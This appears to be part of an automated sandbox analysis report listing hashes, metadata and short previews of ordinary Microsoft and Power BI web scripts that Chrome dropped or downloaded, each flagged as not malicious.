                                                                                                                                                                                                          SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                                                                                          SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                                                                                          SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (771), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):771
                                                                                                                                                                                                          Entropy (8bit):5.093427874261161
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:c9nPyhtGoH4ciOrVHKTwNi1ckRypXw29sdRQ:WPyCoYcZV5NiId9sdRQ
                                                                                                                                                                                                          MD5:740AB27F1AF9A1E5AFC2B85BDB392A7A
                                                                                                                                                                                                          SHA1:40F115FB83C4C670C4AFA4E021F1A357587997F5
                                                                                                                                                                                                          SHA-256:F55C1AEA48174384D171024BF7F13402F9F264019F895A67C9090A021FD7C38D
                                                                                                                                                                                                          SHA-512:5FF8954209D348FC584662CC770CD2849CEB8E5A14D44838F1F3F8D30C7AE3115702B041F508C0075381E71A44D433F00307D3679DBF0F9E1103A19415344A3B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:!function(){"use strict";var t,n,r,i,c={856:function(t,n){Object.defineProperty(n,"__esModule",{value:!0}),n.StyleLibrary=void 0,n.StyleLibrary=function(){return function(){}}()}},s={};function a(t){var n=s[t];if(void 0!==n)return n.exports;var r=s[t]={exports:{}};return c[t](r,r.exports,a),r.exports}t=a.u,n=a.e,r=new Map,i=new Map,a.u=function(e){return t(e)+(r.has(e)?"?"+r.get(e):"")},a.e=function(e){return n(e).catch(function(_){var o=i.has(e)?i.get(e):5;if(o<1){var v=t(e);throw _.message="Loading chunk "+e+" failed after 5 retries.\n("+v+")",_.request=v,_}return new Promise(function(l){setTimeout(function(){var p=Date.now();r.set(e,p),i.set(e,o-1),l(a.e(e))},3e3)})})};var f={};Object.defineProperty(f,"__esModule",{value:!0}),a(856),window.stylelibrary=f}();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19568), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19568
                                                                                                                                                                                                          Entropy (8bit):5.102010233795686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:hoZyzHDEnjhhStmsgfoDKk68Xr6rXUwj/r2GdMGSF:hrzHDWDfoDy8XurXUwj/r2GdMGSF
                                                                                                                                                                                                          MD5:66A3C3A2657BBD73CC02C609F8AA8A75
                                                                                                                                                                                                          SHA1:A5F48A15153486582DC69BEB96D6E1EF7CC5037B
                                                                                                                                                                                                          SHA-256:84B5A46E3E23A2FB87C354665E3BDF4EDF5C7BA56CEE76A10DEB132058F18142
                                                                                                                                                                                                          SHA-512:C27C4758FE6D4CC9AECCD45EB69172C8EF8089D708EC57D52C625D2E5E8C075E2D441884E6A94E1CB6F18E62F97939D6AA67A22F383DA57CF66C7DF276AB528E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:var AuthType,Operation,ErrorCode,TimerUtils,IframeUtils,Constants,LoggingUtils;!function(e){e[e.aad=1]="aad",e[e.msa=2]="msa"}(AuthType||(AuthType={})),function(e){e[e.Redirect=1]="Redirect",e[e.Error=2]="Error"}(Operation||(Operation={})),function(e){e[e.InvalidConfigurations=100]="InvalidConfigurations",e[e.InvalidDataReceivedFromIdp=105]="InvalidDataReceivedFromIdp",e[e.NoAccountFound=110]="NoAccountFound",e[e.TimeOut=115]="TimeOut",e[e.UnknownError=120]="UnknownError",e[e.NonPreferredResponseIgnored=125]="NonPreferredResponseIgnored"}(ErrorCode||(ErrorCode={})),(TimerUtils||(TimerUtils={})).timer=function(){var e=(new Date).getTime();return{get seconds(){return Math.ceil(((new Date).getTime()-e)/1e3)},get ms(){return(new Date).getTime()-e},get formattedSeconds(){return Math.ceil(this.seconds/1e3)+"s"},get formattedMs(){return this.ms+"ms"}}},function(e){e.getIframe=function(e,r){var n=document.createElement("iframe");return n.style.display="none",n.id=r,n.src=e,n},e.deleteIframe=fu
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7280), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):7280
                                                                                                                                                                                                          Entropy (8bit):5.241987256044728
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:OVAzt5/ij1ivpBmEqH66HCjeIRGR+2lVyNSeau:AAJopCpBmEqHZHnIRGR+wVy/au
                                                                                                                                                                                                          MD5:23278F63089A92EFA413F3B0044A941D
                                                                                                                                                                                                          SHA1:28E1B8B5344398B9905F710946DE50068CAC5460
                                                                                                                                                                                                          SHA-256:D1649009529152EE51C7565D38A409466C57650D989BBBD816F17BBA68F0AFD2
                                                                                                                                                                                                          SHA-512:A29AF3A98BB3B372BB937388FFEDE6F21BE6AF54BBCEB11CEFD2038BA74063FD0B1B0E4CCCF7A8E3028653A5CF981F63B6D19579E02C6F139286ED6F3FE778A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/baseMetadataProvider.min.28e1b8b5344398b9905f.js
                                                                                                                                                                                                          Preview:var powerbi;function addOrUpdateQueryString(e,t,n=window.location.search){let a=parseQueryString(n);return a[e]=t,rebuildQueryString(a)}function clearQueryString(e,t=window.location.search){let n=parseQueryString(t);return delete n[e],rebuildQueryString(n)}function parseQueryString(e=window.location.search){let n={},t=e;var a;if(t&&"?"===t.substr(0,1))for(a of t.substr(1).split("&")){let[e,...t]=a.split("=");var o=t.join("=");n[decodeURIComponent(e)]=decodeURIComponent(o)}return n}function rebuildQueryString(e){let t="",n=!0;for(var a in e)n||(t+="&"),t+=encodeURIComponent(a)+"=",e[a]&&(t+=encodeURIComponent(e[a])),n=!1;return n||(t="?"+t),t}function setCookie(e,t,n="/",a="none",o){o||(o=new Date).setFullYear(o.getFullYear()+1),window&&window.document&&(window.document.cookie=e+" = "+t+";secure;partitioned;path="+n+";expires="+o.toUTCString()+";samesite="+a)}function startBaseMetadataLogRequest(e,t,n){t={url:e,start:new Date,requestId:t};return window[n].push(t),t}function endBaseMetad
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (534)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3288
                                                                                                                                                                                                          Entropy (8bit):4.844125421768654
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3jndjqDCc6oq7zCE/5j/mj/FlqplzC7l+tj+6j+7bq/jzCd9QtjQAjQQHUqCqzCt:3jdNGKmlklm7dYjmd20tqmMA
                                                                                                                                                                                                          MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                                                                                          SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                                                                                          SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                                                                                          SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):126398
                                                                                                                                                                                                          Entropy (8bit):5.3715099302912686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:IsRNf1YDV1L3IwZvBZFjbUD5v8+qvxFjUymAC5PnChR2bhfzKp:PRcQm+qvxF9mA0PDhfz4
                                                                                                                                                                                                          MD5:3093A8F2176C92CDE72712378C933EEF
                                                                                                                                                                                                          SHA1:DA736F4A7E9E066A152B4E8A99D145066E812FDF
                                                                                                                                                                                                          SHA-256:3F68F5E5FC3D6300F4EDC10FA99F4C1765CB29CAB31D0B79A94250733D0731A1
                                                                                                                                                                                                          SHA-512:2A1F5B2F53D09462A46043C733B35F46833A29657CD09ECF528F72BB74A6EE503F3253785085F059F29B30343FC8E888A4CA36C927D1A1D6F4B39F9C69339829
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:"use strict";(self.webpackChunkpowerbi_clients=self.webpackChunkpowerbi_clients||[]).push([[0],{720:function(Yc,Ai,mt){mt.r(Ai),mt.d(Ai,{AppInsightsCore:function(){return Ka},ApplicationAnalytics:function(){return Ro},ApplicationInsights:function(){return is},ApplicationInsightsContainer:function(){return Xc},BaseCore:function(){return Ga},BaseTelemetryPlugin:function(){return zt},CoreUtils:function(){return ni},DependenciesPlugin:function(){return ts},DistributedTracingModes:function(){return Oe},Event:function(){return ze},Exception:function(){return we},LoggingSeverity:function(){return k},Metric:function(){return Ze},NotificationManager:function(){return Wa},PageView:function(){return Ve},PageViewPerformance:function(){return lt},PerfEvent:function(){return fn},PerfManager:function(){return ba},PropertiesPlugin:function(){return Go},RemoteDependencyData:function(){return et},Sender:function(){return zo},SeverityLevel:function(){return Cn},Telemetry:function(){return Gc},Trace:funct
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3164)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):34401
                                                                                                                                                                                                          Entropy (8bit):5.567515913811421
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                                                                                                          MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                                                                                          SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                                                                                          SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                                                                                          SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-httpclient.min.ACSHASH5ee9e4e4e0a5fd39092e63d2d102b12b.js
                                                                                                                                                                                                          Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1242), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17782
                                                                                                                                                                                                          Entropy (8bit):5.182595530481779
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:NMXgeRzRWW3fYxmypxo/BJJj1zsbU1tnFnjhkgczTVLl:N2gexvYxmMxo/BJJZzsbU1tnFnjhkgc/
                                                                                                                                                                                                          MD5:93CCEFD34362A08C14E7E9762FC7555D
                                                                                                                                                                                                          SHA1:CFA56D14CDF1789CEE37F11EA6D31FA197050278
                                                                                                                                                                                                          SHA-256:74F428B5EC97E3FA772B5BFE1885A021AE48799F8021FD62BC700FBCA41109A9
                                                                                                                                                                                                          SHA-512:F0782DCEECE0704C03DE8F7BBABA4C5BD86F90907ABF66CB91C2B39763A5E0994D64B47CBE316E762E4305A1BE27DF2326EA4CBBCED2E872A4132244B8DF3B92
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml" >.. <head>.. <title>Power BI Error</title>.. <meta http-equiv="X-UA-Compatible" content="IE=edge;" />.... <meta charset="utf-8">.. <meta name="description" content="">.. <meta name="format-detection" content="telephone=no" />.. <link rel="shortcut icon" href="/images/PowerBI_Favicon.ico" />.. .. Please do not add any script before this line -->.. <script> function cdnFallback(event) {var date = new Date(); var failedRequestUrl = 'unknown'; var sessionSource = 'unknown'; var statusCode = 'unknown'; var durationMs = 'unknown'; var maxAgeInSeconds = 8 * 60 * 60;if (event && event.currentTarget && event.currentTarget.src) {failedRequestUrl = event.currentTarget.src;}if (failedRequestUrl && typeof this.performance.getEntriesByName === 'function' && this.performance.getEntriesByName(failedRequestUrl)[0]) {statusCode = this.performance.getEntriesByName(failedRequestUrl)
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):56755
                                                                                                                                                                                                          Entropy (8bit):4.772033509869393
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:md21iWKHFZV8rQ9KiY2pYhp10npm7Kc1DP:md21QHHAP
                                                                                                                                                                                                          MD5:4AB0EEDAB0BA9025FAA176C16F80B8B4
                                                                                                                                                                                                          SHA1:1F099577B7BD33E3FA02B9D13E19F7A1126E36B8
                                                                                                                                                                                                          SHA-256:3595DE3D23938FCC8107D8811EE9806BA642C235BF0EB9073B99AE3A0C5D62DE
                                                                                                                                                                                                          SHA-512:F293BF08DA53E3A01C0CE65CEFD4F3D680B9AE7375EEC13D92FB1FEFEE7CEA975C0916C895D31CBAEF535BF5914BBAF14EC5639D3EB6B670A8798094A9E39BD9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH4ab0eedab0ba9025faa176c16f80b8b4.js
                                                                                                                                                                                                          Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11232
                                                                                                                                                                                                          Entropy (8bit):4.6331503450371505
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:tgwsKEAOoPWvmsljFvgWIxQ7Mvdtdt+6HaAyawyQnMvxgGZUOxhBLz6PsF7TAVNQ:OKbO97gW54VPiTpnMvxDXVWxRWeE
                                                                                                                                                                                                          MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                                                                                          SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                                                                                          SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                                                                                          SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                          Entropy (8bit):4.971196656935236
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                                                                                                          MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                                                                                          SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                                                                                          SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                                                                                                          SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):544
                                                                                                                                                                                                          Entropy (8bit):5.221040627274746
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                                                                                                          MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                                                                                          SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                                                                                          SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                                                                                          SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js
                                                                                                                                                                                                          Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65154)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):670684
                                                                                                                                                                                                          Entropy (8bit):5.433719344565622
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:Vx/GqVXOQnci8eGRuufsr5zQ47GKXUZMUpAnfsqY3VOm1/muDVyGZht1dDgFeSXf:Vx/hVwiURum05bLmXQGPd0f
                                                                                                                                                                                                          MD5:F6C117781C99DDCDF833C21E54E69A0D
                                                                                                                                                                                                          SHA1:7529D8E1F5F3AF34083AF5818E941EDF96965496
                                                                                                                                                                                                          SHA-256:C44A878AB0193B2F2F94697B0C46878CE5103EA044421CD4668EDD12BBDBEA1B
                                                                                                                                                                                                          SHA-512:6335172C6667D7EE63CA6D41AEA24F5026E3E3D92CAFB92C39BC8FD9629D25DFDD2F3E2F771EA8CADCD958E70E2EEF6A87ED8FAE4BA5D518C0A166B6C9BA26DA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/powerbiportal.externals.bundle.min.7529d8e1f5f3af34083a.js
                                                                                                                                                                                                          Preview:.this.parseTimeMarkers = this.parseTimeMarkers || {};.var marker = this.parseTimeMarkers['powerbiportal.externals.bundle.min.js'] || (this.parseTimeMarkers['powerbiportal.externals.bundle.min.js'] = {});.marker.startEval = window.jsCommon && window.jsCommon.performance && window.jsCommon.performance.now ? window.jsCommon.performance.now() : Date.now(); marker.isExternal = false;.if (window.perfTracking && window.perfTracking.startBundleEval) window.perfTracking.startBundleEval('powerbiportal.externals.bundle.min.js');var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["polyfills.min.js"]||(this.parseTimeMarkers["polyfills.min.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("polyfills.min.js"),function(){"use strict";var t={7573:function(){!function(t){var e=t.perf
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (509)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):775
                                                                                                                                                                                                          Entropy (8bit):5.006726191017576
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:Tb0grd1xT5FeKlqyE8J6V8JIxbMfex8mAXpydmc7:Tb9k46tCfeLAXpyIc7
                                                                                                                                                                                                          MD5:FE68B59E840A1A274393B3AB03C85E96
                                                                                                                                                                                                          SHA1:C8C1B1196B05E9ADB6D342390956A231920B2017
                                                                                                                                                                                                          SHA-256:9F01AEA27D73C422AC5E7E87C2F7F3CE364E1F940FAEB6CF3178B5E13CB43497
                                                                                                                                                                                                          SHA-512:58921A6195363008A3DD65AF8D115828C3F93FB23CCCC9FB5D2FAF7AF55F5779EFBA947B990DEDF5B2751F3ED0BA4071F006873FFB68F77CCA3C8D565092A90D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';(function(e){e.addEventListener("DOMContentLoaded",()=>{const a=$(".faq-collapse"),f={"bi-bhvr":{off:a.data("expandbhvr"),on:a.data("collapsebhvr")},"bi-cn":{off:a.data("expand"),on:a.data("collapse")},"bi-ecn":{off:a.data("enexpand"),on:a.data("encollapse")},"bi-ct":{off:a.data("expandtemplatename"),on:a.data("collapsetemplatename")}},d=b=>{const g=b.triggerElement.classList.contains("collapsed");Object.entries(f).forEach(([h,c])=>{b.triggerElement.setAttribute(`data-${h}`,g?c.off:c.on)})},.k=window.ocrReimagine.CollapseExtension.getInstances().filter(b=>b.triggerElement.classList.contains("ocr-faq-item__header"));0<a.length&&k.forEach(b=>{b.el.addEventListener("onHidden",d.bind(this,b));b.el.addEventListener("onShown",d.bind(this,b))})})})(document);
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22793), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):22793
                                                                                                                                                                                                          Entropy (8bit):5.31974440911933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:Yv8n+Mf4QeX2rFac+vco1gg/om/Cq49AlNdYANx2lcPXiFsSSNZSiHNcChg9ri:g2+VIevco1gg/om8JyxUcPyFsTNIiHNl
                                                                                                                                                                                                          MD5:9A2DD9E848F1510A9C96FD894C1A2CF7
                                                                                                                                                                                                          SHA1:07BEB954417FA67AD27460D7DDDD19817DD58713
                                                                                                                                                                                                          SHA-256:CB570D89C96442B7E63C6C0B079457C30C783E79204AEF0A16023CA44705E8FC
                                                                                                                                                                                                          SHA-512:DD97D4260483F57352A899783A386225B75F1E37A0D89E719C1F9EB46925815C465314D46A5007E66A5393B2E005518C0A599589DF3EA281AA803C9027F4A517
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/powerBIWebBootstrap.min.4647604e06381931a60a.js
                                                                                                                                                                                                          Preview:"use strict";var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["powerBIWebBootstrap.js"]||(this.parseTimeMarkers["powerBIWebBootstrap.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("powerBIWebBootstrap.js"),function(){var R={d:function(e,n){for(var t in n)R.o(n,t)&&!R.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:n[t]})},o:function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},r:function(e){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}};!function(){if(typeof R<"u"){var e=R.u,n=R.e,t=new Map,a=new Map;R.u=function(o){return e(o)+(t.has(o)?"?"+t.get(o):"")},R.e=function(o){return n(o).catch(function(s){var p=a.has(o)?a.get(o):5;if(p<1){var f=e(o
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (590)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                          Entropy (8bit):5.2304068952006615
                                                                                                                                                                                                          Encrypted:false
